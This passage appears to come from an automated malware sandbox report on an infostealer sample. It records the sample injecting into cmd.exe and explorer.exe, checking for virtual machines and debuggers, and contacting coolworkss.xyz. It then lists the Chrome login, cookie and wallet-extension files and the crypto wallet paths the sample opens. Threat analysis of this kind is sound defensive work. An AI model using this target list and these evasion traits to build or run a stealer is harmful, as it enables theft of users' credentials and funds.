            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: lJ2eYRm0Bd.exeStatic PE information: More than 892 > 100 exports found
            Source: lJ2eYRm0Bd.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: lJ2eYRm0Bd.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: lJ2eYRm0Bd.exeStatic file information: File size 6599040 > 1048576
            Source: lJ2eYRm0Bd.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3d6e00
            Source: lJ2eYRm0Bd.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1fb600
            Source: lJ2eYRm0Bd.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: lJ2eYRm0Bd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: explorer.pdbUGP source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: ntdll.pdb source: lJ2eYRm0Bd.exe, 00000000.00000002.282901842.00000000039D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000001.00000002.372995350.0000000005631000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.373078984.0000000005950000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455324211.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455428620.0000000005040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ntdll.pdbUGP source: lJ2eYRm0Bd.exe, 00000000.00000002.282901842.00000000039D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: cmd.exe, 00000001.00000002.372995350.0000000005631000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.373078984.0000000005950000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455324211.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455428620.0000000005040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: explorer.pdb source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008B56CF push eax; mov dword ptr [esp], D3455974h19_2_008B56D0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D88DF push ecx; ret 19_2_008D88F2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008917F3 push eax; mov dword ptr [esp], 00000000h19_2_008917F8
            Source: lJ2eYRm0Bd.exeStatic PE information: section name: text
            Source: kheeknpom.1.drStatic PE information: section name: klnhh
            Source: kheeknpom.1.drStatic PE information: real checksum: 0x0 should be: 0x688c6
            Source: lJ2eYRm0Bd.exeStatic PE information: real checksum: 0x6523bb should be: 0x653cd6
            Source: initial sampleStatic PE information: section name: .text entropy: 6.809602249269922
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\kheeknpomJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\kheeknpomJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\PACKAGES\MICROSOFT.WINDOWS.CONTENTDELIVERYMANAGER_CW5N1H2TXYEWY\LOCALSTATE\CONTENTMANAGEMENTSDK\CREATIVES\310091\EVENTBEACONS.DAT
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_19-31162
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_19-30835
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe TID: 6996Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6260Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_19-30868
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_19-30687
            Source: C:\Windows\SysWOW64\explorer.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeMemory allocated: 38D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_19-30853
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_19-30850
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,19_2_008AD8F0
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D807F FindFirstFileExW,19_2_008D807F
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D8133 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_008D8133
            Source: C:\Windows\SysWOW64\explorer.exeAPI call chain: ExitProcess graph end nodegraph_19-30693
            Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
            Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
            Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
            Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000548000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.00000000032A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
            Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
            Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mwww.@vmware"m0
            Source: lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C1355 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_008C1355
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008B8144 GetProcessHeap,RtlFreeHeap,19_2_008B8144
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C0073 mov eax, dword ptr fs:[00000030h]19_2_008C0073
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008CADBA mov ecx, dword ptr fs:[00000030h]19_2_008CADBA
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D5E85 mov eax, dword ptr fs:[00000030h]19_2_008D5E85
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C1349 SetUnhandledExceptionFilter,19_2_008C1349
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C1860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_008C1860
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C1355 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_008C1355
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D46AB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_008D46AB

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\explorer.exeDomain query: coolworkss.xyz
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.60.111 80Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 172.67.195.229 80Jump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: C:\Users\user\AppData\Local\Temp\kheeknpom target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 6B4E1000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 26F380Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 890000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5632 base: 26F380 value: 55Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5632 base: 890000 value: 00Jump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C1578 cpuid 19_2_008C1578
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeCode function: 0_2_00000001403AFE58 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00000001403AFE58
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D9D44 GetTimeZoneInformation,19_2_008D9D44

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7020, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: explorer.exe, 00000013.00000003.359062273.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: explorer.exe, 00000013.00000003.375236074.0000000005A1E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Chrome/Default/Extensions/Jaxx Liberty
            Source: explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
            Source: explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5632, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
